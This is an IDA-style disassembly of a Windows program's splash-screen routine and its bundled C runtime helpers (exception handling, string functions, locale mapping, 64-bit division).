stosd
lea eax, [ebp+var_38]
push eax
push 18h
push [ebp+arg_0]
call ds:dword_4E67F8 ;; GetObjectA
mov ds:dword_4EAA60, 30h
mov ds:dword_4EAA68, offset sub_4D115E
mov ds:dword_4EAA88, offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
mov ds:dword_4EAA74, eax
push offset dword_4EAA60
call ds:dword_4E6814 ;; RegisterClassExA
push 10h
call ds:dword_4E6818 ;; GetSystemMetrics
mov [ebp+var_20], eax
push 11h
call ds:dword_4E6818 ;; GetSystemMetrics
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
sub eax, [ebp+var_34]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
sub eax, [ebp+var_30]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+var_14]
add eax, [ebp+var_34]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_30]
mov [ebp+var_8], eax
mov [ebp+var_58], 98800000h
push 0
push 0
push [ebp+var_58]
lea eax, [ebp+var_14]
push eax
call ds:dword_4E3054 ;; AdjustWindowRectEx
push 0
push 0
push 0
push 0
mov eax, [ebp+var_8]
sub eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_14]
push eax
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_58]
push offset dword_4E6918
push offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_4E681C ;; CreateWindowExA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4EAA54, eax
loc_4D136B: ; CODE XREF: sub_4D1271+133�j
push 0
push 0
push [ebp+var_4]
lea eax, [ebp+var_54]
push eax
call ds:dword_4E6820 ;; GetMessageA
test eax, eax
jz short loc_4D13A6
mov eax, [ebp+var_54]
cmp eax, [ebp+var_4]
jnz short loc_4D1390
cmp [ebp+var_50], 0
jnz short loc_4D1390
jmp short loc_4D13A6
; ---------------------------------------------------------------------------
loc_4D1390: ; CODE XREF: sub_4D1271+115�j
; sub_4D1271+11B�j
lea eax, [ebp+var_54]
push eax
call ds:dword_4E6824 ;; TranslateMessage
lea eax, [ebp+var_54]
push eax
call ds:dword_4E6828 ;; DispatchMessageA
jmp short loc_4D136B
; ---------------------------------------------------------------------------
loc_4D13A6: ; CODE XREF: sub_4D1271+10D�j
; sub_4D1271+11D�j
push 64h
call ds:dword_4E6794 ;; Sleep
and [ebp+var_1C], 0
jmp short loc_4D13BB
; ---------------------------------------------------------------------------
loc_4D13B4: ; CODE XREF: sub_4D1271+170�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4D13BB: ; CODE XREF: sub_4D1271+141�j
cmp [ebp+var_1C], 64h
jge short loc_4D13E3
push 0
push offset sub_4D1216
call ds:dword_4E6830 ;; EnumWindows
cmp ds:dword_4EAA54, 0
jnz short loc_4D13D9
jmp short loc_4D13E3
; ---------------------------------------------------------------------------
loc_4D13D9: ; CODE XREF: sub_4D1271+164�j
push 64h
call ds:dword_4E6794 ;; Sleep
jmp short loc_4D13B4
; ---------------------------------------------------------------------------
loc_4D13E3: ; CODE XREF: sub_4D1271+14E�j
; sub_4D1271+166�j
push [ebp+arg_0]
call ds:dword_4E6800 ;; DeleteObject
xor eax, eax
pop edi
leave
retn 4
sub_4D1271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D13F3 proc near ; CODE XREF: sub_4D9DC0+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 3
push 80000000h
push offset a_splashscreen_ ; "_splashscreen.bmp"
call sub_4D5346
test eax, eax
jz short locret_4D1450
push [ebp+var_4]
call sub_4DA456
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4D1446
push offset dword_4EAA58
push 0
push [ebp+var_8]
push offset sub_4D1271
push 0
push 0
call ds:dword_4E683C ;; CreateThread
push 64h
call ds:dword_4E6794 ;; Sleep
loc_4D1446: ; CODE XREF: sub_4D13F3+30�j
push 0
push [ebp+var_4]
call sub_4D5741
locret_4D1450: ; CODE XREF: sub_4D13F3+1E�j
leave
retn
sub_4D13F3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1454 proc near ; CODE XREF: sub_4D154C+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4D146C
push [ebp+arg_0]
call sub_4D1F68 ; RtlUnwind
loc_4D146C: ; DATA XREF: sub_4D1454+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4D1454 endp
; =============== S U B R O U T I N E =======================================
sub_4D1474 proc near ; DATA XREF: sub_4D1496+A�o
; _4:004D1507�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4D1495
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4D1495: ; CODE XREF: sub_4D1474+10�j
retn
sub_4D1474 endp
; =============== S U B R O U T I N E =======================================
sub_4D1496 proc near ; CODE XREF: sub_4D154C+67�p
; sub_4D154C+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4D1474
push large dword ptr fs:0
mov large fs:0, esp
loc_4D14B3: ; CODE XREF: sub_4D1496:loc_4D14EE�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4D14F0
cmp esi, [esp+1Ch+arg_4]
jz short loc_4D14F0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4D14EE
push 101h
mov eax, [ebx+esi*4+8]
call sub_4D152A
call dword ptr [ebx+esi*4+8]
loc_4D14EE: ; CODE XREF: sub_4D1496+44�j
jmp short loc_4D14B3
; ---------------------------------------------------------------------------
loc_4D14F0: ; CODE XREF: sub_4D1496+2A�j
; sub_4D1496+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4D1496 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4D1474
jnz short locret_4D1520
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4D1520
mov eax, 1
locret_4D1520: ; CODE XREF: _4:004D150E�j _4:004D1519�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_4E6434
jmp short loc_4D1534
; =============== S U B R O U T I N E =======================================
sub_4D152A proc near ; CODE XREF: sub_4D1496+4F�p
; sub_4D154C+78�p
push ebx
push ecx
mov ebx, offset dword_4E6434
mov ecx, [ebp+8]
loc_4D1534: ; CODE XREF: _4:004D1528�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_4D152A endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D154C proc near ; DATA XREF: sub_4D1000+A�o
; sub_4D1A80+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_4D15EC
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4D157F: ; CODE XREF: sub_4D154C+90�j
cmp esi, 0FFFFFFFFh
jz short loc_4D15E5
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_4D15D3
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_4D15D3
js short loc_4D15DE
mov edi, [ebx+8]
push ebx
call sub_4D1454
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4D1496
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_4D152A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_4D15D3: ; CODE XREF: sub_4D154C+40�j
; sub_4D154C+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4D157F
; ---------------------------------------------------------------------------
loc_4D15DE: ; CODE XREF: sub_4D154C+54�j
mov eax, 0
jmp short loc_4D1601
; ---------------------------------------------------------------------------
loc_4D15E5: ; CODE XREF: sub_4D154C+36�j
mov eax, 1
jmp short loc_4D1601
; ---------------------------------------------------------------------------
loc_4D15EC: ; CODE XREF: sub_4D154C+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4D1496
add esp, 8
pop ebp
mov eax, 1
loc_4D1601: ; CODE XREF: sub_4D154C+97�j
; sub_4D154C+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4D154C endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4D1496
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_4D1640
loc_4D1630: ; CODE XREF: sub_4D1640+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4D1640
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4D1640 proc near ; CODE XREF: sub_4D4166+2A�p
; sub_4DDA16+AF�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004D1630 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4D166B
loc_4D1658: ; CODE XREF: sub_4D1640+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_4D1630
test cl, cl
jz short loc_4D16B4
test edx, 3
jnz short loc_4D1658
loc_4D166B: ; CODE XREF: sub_4D1640+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4D1676: ; CODE XREF: sub_4D1640+61�j
; sub_4D1640+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4D16B8
and eax, 81010100h
jz short loc_4D1676
and eax, 1010100h
jnz short loc_4D16B2
and esi, 80000000h
jnz short loc_4D1676
loc_4D16B2: ; CODE XREF: sub_4D1640+68�j
; sub_4D1640+81�j ...
pop esi
pop edi
loc_4D16B4: ; CODE XREF: sub_4D1640+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4D16B8: ; CODE XREF: sub_4D1640+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4D16F5
test al, al
jz short loc_4D16B2
cmp ah, bl
jz short loc_4D16EE
test ah, ah
jz short loc_4D16B2
shr eax, 10h
cmp al, bl
jz short loc_4D16E7
test al, al
jz short loc_4D16B2
cmp ah, bl
jz short loc_4D16E0
test ah, ah
jz short loc_4D16B2
jmp short loc_4D1676
; ---------------------------------------------------------------------------
loc_4D16E0: ; CODE XREF: sub_4D1640+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4D16E7: ; CODE XREF: sub_4D1640+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4D16EE: ; CODE XREF: sub_4D1640+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4D16F5: ; CODE XREF: sub_4D1640+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_4D1640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1700 proc near ; CODE XREF: sub_4D4252+FB�p
; sub_4D7DD0+161�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_4D1721
xor eax, eax
jmp short loc_4D1723
; ---------------------------------------------------------------------------
loc_4D1721: ; CODE XREF: sub_4D1700+1B�j
mov eax, edi
loc_4D1723: ; CODE XREF: sub_4D1700+1F�j
cld
pop edi
leave
retn
sub_4D1700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1730 proc near ; CODE XREF: sub_4D653F+5E�p
; sub_4D653F+1AB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4D1761
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4D175F
jz short loc_4D1761
dec ecx
dec ecx
loc_4D175F: ; CODE XREF: sub_4D1730+29�j
not ecx
loc_4D1761: ; CODE XREF: sub_4D1730+9�j
; sub_4D1730+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_4D1730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4D1770 proc near ; CODE XREF: sub_4D6CC4+1AF�p
; sub_4D6CC4+434�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_4D17F3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4D1794
shr ecx, 2
jnz short loc_4D1801
jmp short loc_4D17B5
; ---------------------------------------------------------------------------
loc_4D1794: ; CODE XREF: sub_4D1770+1B�j
; sub_4D1770+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4D17C2
test al, al
jz short loc_4D17CA
test esi, 3
jnz short loc_4D1794
mov ebx, ecx
shr ecx, 2
jnz short loc_4D1801
loc_4D17B0: ; CODE XREF: sub_4D1770+8F�j
and ebx, 3
jz short loc_4D17C2
loc_4D17B5: ; CODE XREF: sub_4D1770+22�j
; sub_4D1770+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_4D17EE
dec ebx
jnz short loc_4D17B5
loc_4D17C2: ; CODE XREF: sub_4D1770+2B�j
; sub_4D1770+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4D17CA: ; CODE XREF: sub_4D1770+2F�j
test edi, 3
jz short loc_4D17E4
loc_4D17D2: ; CODE XREF: sub_4D1770+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4D1866
test edi, 3
jnz short loc_4D17D2
loc_4D17E4: ; CODE XREF: sub_4D1770+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4D1857
loc_4D17EB: ; CODE XREF: sub_4D1770+7F�j
; sub_4D1770+F4�j
mov [edi], al
inc edi
loc_4D17EE: ; CODE XREF: sub_4D1770+4D�j
dec ebx
jnz short loc_4D17EB
pop ebx
pop esi
loc_4D17F3: ; CODE XREF: sub_4D1770+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4D17F9: ; CODE XREF: sub_4D1770+A9�j
; sub_4D1770+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4D17B0
loc_4D1801: ; CODE XREF: sub_4D1770+20�j
; sub_4D1770+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4D17F9
test dl, dl
jz short loc_4D184B
test dh, dh
jz short loc_4D1841
test edx, 0FF0000h
jz short loc_4D1837
test edx, 0FF000000h
jnz short loc_4D17F9
mov [edi], edx
jmp short loc_4D184F
; ---------------------------------------------------------------------------
loc_4D1837: ; CODE XREF: sub_4D1770+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4D184F
; ---------------------------------------------------------------------------
loc_4D1841: ; CODE XREF: sub_4D1770+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4D184F
; ---------------------------------------------------------------------------
loc_4D184B: ; CODE XREF: sub_4D1770+AD�j
xor edx, edx
mov [edi], edx
loc_4D184F: ; CODE XREF: sub_4D1770+C5�j
; sub_4D1770+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4D1861
loc_4D1857: ; CODE XREF: sub_4D1770+79�j
xor eax, eax
loc_4D1859: ; CODE XREF: sub_4D1770+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4D1859
loc_4D1861: ; CODE XREF: sub_4D1770+E5�j
and ebx, 3
jnz short loc_4D17EB
loc_4D1866: ; CODE XREF: sub_4D1770+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4D1770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D186E proc near ; CODE XREF: sub_4D10D6+24�p
; sub_4D10D6+2F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4EB0F4, 0
push ebx
push esi
push edi
jnz short loc_4D189B
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4D1934
cmp eax, 5Ah
jg loc_4D1934
add eax, 20h
jmp loc_4D1934
; ---------------------------------------------------------------------------
loc_4D189B: ; CODE XREF: sub_4D186E+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_4D18CF
cmp ds:dword_4E665C, esi
jle short loc_4D18BD
push esi
push ebx
call sub_4D1CCF
pop ecx
pop ecx
jmp short loc_4D18C7
; ---------------------------------------------------------------------------
loc_4D18BD: ; CODE XREF: sub_4D186E+42�j
mov eax, ds:off_4E6450
mov al, [eax+ebx*2]
and eax, esi
loc_4D18C7: ; CODE XREF: sub_4D186E+4D�j
test eax, eax
jnz short loc_4D18CF
loc_4D18CB: ; CODE XREF: sub_4D186E+AD�j
mov eax, ebx
jmp short loc_4D1934
; ---------------------------------------------------------------------------
loc_4D18CF: ; CODE XREF: sub_4D186E+3A�j
; sub_4D186E+5B�j
mov edx, ds:off_4E6450
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4D18F3
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4D18FC
; ---------------------------------------------------------------------------
loc_4D18F3: ; CODE XREF: sub_4D186E+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4D18FC: ; CODE XREF: sub_4D186E+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_4EB0F4
call sub_4D1A80
add esp, 20h
test eax, eax
jz short loc_4D18CB
cmp eax, esi
jnz short loc_4D1927
movzx eax, [ebp+var_4]
jmp short loc_4D1934
; ---------------------------------------------------------------------------
loc_4D1927: ; CODE XREF: sub_4D186E+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4D1934: ; CODE XREF: sub_4D186E+16�j
; sub_4D186E+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4D186E endp
; ---------------------------------------------------------------------------
align 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+14h]
or eax, eax
jge short loc_4D1961
inc edi
mov edx, [esp+10h]
neg eax
neg edx
sbb eax, 0
mov [esp+14h], eax
mov [esp+10h], edx
loc_4D1961: ; CODE XREF: _4:004D194B�j
mov eax, [esp+1Ch]
or eax, eax
jge short loc_4D197D
inc edi
mov edx, [esp+18h]
neg eax
neg edx
sbb eax, 0
mov [esp+1Ch], eax
mov [esp+18h], edx
loc_4D197D: ; CODE XREF: _4:004D1967�j
or eax, eax
jnz short loc_4D1999
mov ecx, [esp+18h]
mov eax, [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+10h]
div ecx
mov edx, ebx
jmp short loc_4D19DA
; ---------------------------------------------------------------------------
loc_4D1999: ; CODE XREF: _4:004D197F�j
mov ebx, eax
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
loc_4D19A7: ; CODE XREF: _4:004D19B1�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4D19A7
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, [esp+18h]
mul esi
add edx, ecx
jb short loc_4D19D5
cmp edx, [esp+14h]
ja short loc_4D19D5
jb short loc_4D19D6
cmp eax, [esp+10h]
jbe short loc_4D19D6
loc_4D19D5: ; CODE XREF: _4:004D19C5�j _4:004D19CB�j
dec esi
loc_4D19D6: ; CODE XREF: _4:004D19CD�j _4:004D19D3�j
xor edx, edx
mov eax, esi
loc_4D19DA: ; CODE XREF: _4:004D1997�j
dec edi
jnz short loc_4D19E4
neg edx
neg eax
sbb edx, 0
loc_4D19E4: ; CODE XREF: _4:004D19DB�j
pop ebx
pop esi
pop edi
retn 10h
; =============== S U B R O U T I N E =======================================
sub_4D19EA proc near ; CODE XREF: sub_4D1A75+4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_4D19F2: ; CODE XREF: sub_4D19EA+34�j
cmp ds:dword_4E665C, 1
jle short loc_4D1A0A
movzx eax, byte ptr [edi]
push 8
push eax
call sub_4D1CCF
pop ecx
pop ecx
jmp short loc_4D1A19
; ---------------------------------------------------------------------------
loc_4D1A0A: ; CODE XREF: sub_4D19EA+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_4E6450
mov al, [ecx+eax*2]
and eax, 8
loc_4D1A19: ; CODE XREF: sub_4D19EA+1E�j
test eax, eax
jz short loc_4D1A20
inc edi
jmp short loc_4D19F2
; ---------------------------------------------------------------------------
loc_4D1A20: ; CODE XREF: sub_4D19EA+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4D1A30
cmp esi, 2Bh
jnz short loc_4D1A34
loc_4D1A30: ; CODE XREF: sub_4D19EA+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4D1A34: ; CODE XREF: sub_4D19EA+44�j
xor ebx, ebx
loc_4D1A36: ; CODE XREF: sub_4D19EA+7B�j
cmp ds:dword_4E665C, 1
jle short loc_4D1A4B
push 4
push esi
call sub_4D1CCF
pop ecx
pop ecx
jmp short loc_4D1A56
; ---------------------------------------------------------------------------
loc_4D1A4B: ; CODE XREF: sub_4D19EA+53�j
mov eax, ds:off_4E6450
mov al, [eax+esi*2]
and eax, 4
loc_4D1A56: ; CODE XREF: sub_4D19EA+5F�j
test eax, eax
jz short loc_4D1A67
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4D1A36
; ---------------------------------------------------------------------------
loc_4D1A67: ; CODE XREF: sub_4D19EA+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_4D1A70
neg eax
loc_4D1A70: ; CODE XREF: sub_4D19EA+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4D19EA endp
; =============== S U B R O U T I N E =======================================
sub_4D1A75 proc near ; CODE XREF: _4:004DFD6B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4D19EA
pop ecx
retn
sub_4D1A75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1A80 proc near ; CODE XREF: sub_4D186E+A3�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3B08
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4EB0E8, edi
jnz short loc_4D1AF6
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4E3B00
mov esi, 100h
push esi
push edi
call ds:dword_4E3034 ;; LCMapStringW
test eax, eax
jz short loc_4D1AD4
mov ds:dword_4EB0E8, ebx
jmp short loc_4D1AF6
; ---------------------------------------------------------------------------
loc_4D1AD4: ; CODE XREF: sub_4D1A80+4A�j
push edi
push edi
push ebx
push offset dword_4E3AFC
push esi
push edi
call ds:dword_4E3038 ;; LCMapStringA
test eax, eax
jz loc_4D1C0E
mov ds:dword_4EB0E8, 2
loc_4D1AF6: ; CODE XREF: sub_4D1A80+2E�j
; sub_4D1A80+52�j
cmp [ebp+arg_C], edi
jle short loc_4D1B0B
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4D1CA4
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_4D1B0B: ; CODE XREF: sub_4D1A80+79�j
mov eax, ds:dword_4EB0E8
cmp eax, 2
jnz short loc_4D1B32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E3038 ;; LCMapStringA
jmp loc_4D1C10
; ---------------------------------------------------------------------------
loc_4D1B32: ; CODE XREF: sub_4D1A80+93�j
cmp eax, 1
jnz loc_4D1C0E
cmp [ebp+arg_18], edi
jnz short loc_4D1B48
mov eax, ds:dword_4EB104
mov [ebp+arg_18], eax
loc_4D1B48: ; CODE XREF: sub_4D1A80+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_4E3044 ;; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_4D1C0E
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4D1D90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D1BA3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_4D1BA3: ; CODE XREF: sub_4D1A80+10E�j
cmp [ebp+var_24], edi
jz short loc_4D1C0E
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4E3044 ;; MultiByteToWideChar
test eax, eax
jz short loc_4D1C0E
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E3034 ;; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_4D1C0E
test byte ptr [ebp+arg_4+1], 4
jz short loc_4D1C22
cmp [ebp+arg_14], edi
jz loc_4D1C9D
cmp esi, [ebp+arg_14]
jg short loc_4D1C0E
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E3034 ;; LCMapStringW
test eax, eax
jnz loc_4D1C9D
loc_4D1C0E: ; CODE XREF: sub_4D1A80+66�j
; sub_4D1A80+B5�j ...
xor eax, eax
